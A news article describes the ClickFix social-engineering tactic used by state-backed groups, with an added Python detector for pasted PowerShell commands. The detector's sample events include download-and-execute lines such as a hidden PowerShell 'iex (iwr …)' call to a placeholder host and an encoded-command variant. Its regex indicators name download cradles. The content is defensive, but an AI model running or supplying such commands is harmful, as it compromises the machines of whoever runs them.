ClickFix: The Hackers' Scam to Trick Users Into Installing Malware

Swagta Nath

A growing number of state-backed hacking groups from North Korea, Iran, and Russia are leveraging a deceptive cyberattack method known as ClickFix, which is rapidly gaining popularity among advanced persistent threat (APT) actors due to its high success rate and low technical visibility.

ClickFix operates as a social engineering scheme, where attackers lure victims to malicious websites mimicking legitimate software portals or document-sharing platforms. Once on the site, users are confronted with fake error messages claiming a document or software download has failed. To “fix” the issue, victims are prompted to manually run a PowerShell or command-line script, unknowingly launching malware on their system.

Global Adoption by State-Sponsored Threat Actors

Cybersecurity firm Proofpoint recently released a report documenting widespread adoption of ClickFix between late 2024 and early 2025, naming APT groups like Kimsuky (North Korea), MuddyWater (Iran), APT28, and a Russian-linked actor dubbed UNK_RemoteRogue as users of the tactic in espionage campaigns.

  • North Korea’s Kimsuky: Targeted think tanks involved in Korean policy using emails that impersonated Japanese diplomats. The phishing messages linked to fake secure drives that prompted targets to register devices via PowerShell commands, ultimately installing QuasarRAT while displaying decoy documents to avoid suspicion.

  • Iran’s MuddyWater: Masqueraded as Microsoft in mid-November 2024, sending phishing emails to 39 organizations across the Middle East. Victims were tricked into executing a PowerShell script under the guise of applying a critical security patch, which instead installed ‘Level’, a remote monitoring tool used for surveillance and data theft.

  • Russia’s UNK_RemoteRogue: Targeted firms linked to an arms manufacturer in December 2024. Emails from compromised Zimbra servers directed victims to fake Microsoft Word pages with instructions and even a YouTube tutorial, leading to PowerShell execution tied to the Empire C2 framework.

  • APT28 (Fancy Bear): Another Russian threat actor, linked to the GRU, used ClickFix in October 2024 to distribute phishing emails that mimicked Google Spreadsheets and prompted users through a reCAPTCHA spoof. Once the user ran the script, it established an SSH tunnel and deployed Metasploit, granting attackers backdoor access to the device.

Why ClickFix Works

Unlike traditional phishing, which depends on malicious file attachments, ClickFix relies on user-initiated command execution. This bypasses many automated security filters because the victim enters the commands manually, often believing they are resolving a technical issue.
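The flip side of this, as an added example that is not from the article or from Proofpoint's report: a command the victim pastes into the Run dialog never passes a mail or attachment filter, but it does appear in endpoint process telemetry as a shell spawned by explorer.exe with a download-and-execute command line. The record format, the sample events and the indicator regexes below are constructed assumptions for illustration, not a published detection rule.

```python
import re
from typing import NamedTuple

class ProcessEvent(NamedTuple):
    parent_image: str
    image: str
    command_line: str

# The Run dialog and the File Explorer address bar both spawn children of
# explorer.exe, which is the launch path a ClickFix victim is steered into.
INTERACTIVE_PARENTS = {"explorer.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Traits of a pasted "fix" command. These regexes are an assumption made for
# this example; tune them against your own telemetry before relying on them.
INDICATORS = [
    ("download_cradle", re.compile(r"\b(iwr|invoke-webrequest|downloadstring|curl|wget)\b", re.I)),
    ("inline_eval", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("encoded_command", re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden\b", re.I)),
    ("remote_url", re.compile(r"https?://", re.I)),
]

# Constructed sample process-creation records: "parent | image | command line".
SAMPLE_EVENTS = [
    r'C:\Windows\explorer.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -w hidden -nop -c "iex (iwr http://example.invalid/fix.ps1)"',  # ClickFix-style paste into Win+R
    r'C:\Windows\explorer.exe | C:\Windows\System32\cmd.exe | cmd /c "powershell -EncodedCommand QQBCAEMA"',  # same pattern routed through cmd.exe
    r'C:\Windows\System32\svchost.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -ExecutionPolicy Bypass -File C:\ProgramData\Inventory\collect.ps1',  # scheduled task: non-interactive parent
    r'C:\Windows\explorer.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell',  # user simply opened a console
]

def parse_event(line: str) -> ProcessEvent:
    parent, image, cmd = (p.strip() for p in line.split("|", 2))
    return ProcessEvent(parent, image, cmd)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(event: ProcessEvent) -> list[str]:
    """Indicator labels that make this event look like ClickFix; [] if none."""
    if basename(event.parent_image) not in INTERACTIVE_PARENTS or basename(event.image) not in SHELLS:
        return []
    return [label for label, rx in INDICATORS if rx.search(event.command_line)]

def scan(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Run classify over raw log lines; return (command_line, labels) per hit."""
    hits = [(ev, classify(ev)) for ev in map(parse_event, lines)]
    return [(ev.command_line, labels) for ev, labels in hits if labels]
```

The scheduled-task line carries an execution-policy bypass yet is not flagged, because the parent process is the discriminator that matters here, not the flag alone.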

Experts warn that the success of ClickFix is driven by a lack of user awareness regarding the risks of executing unfamiliar scripts, especially with administrator privileges.

Microsoft and Cybersecurity Experts Respond

Microsoft’s Threat Intelligence team previously flagged the rise of ClickFix in campaigns run by Kimsuky and highlighted the need for global awareness. Proofpoint’s latest analysis further confirms that ClickFix is becoming a go-to method for modern cyber espionage, especially among actors aligned with hostile state agendas.

How to Stay Safe

Security professionals advise users to:

  • Never run commands from emails or websites unless verified.

  • Avoid copying scripts into command prompts or PowerShell from unknown sources.

  • Check email sources, domain names, and grammar for signs of impersonation.

  • Report suspicious messages to IT or cybersecurity teams.

As state-backed cyber campaigns evolve, ClickFix stands out as a potent reminder of how human error remains one of the most exploited vulnerabilities in today’s digital threat landscape.
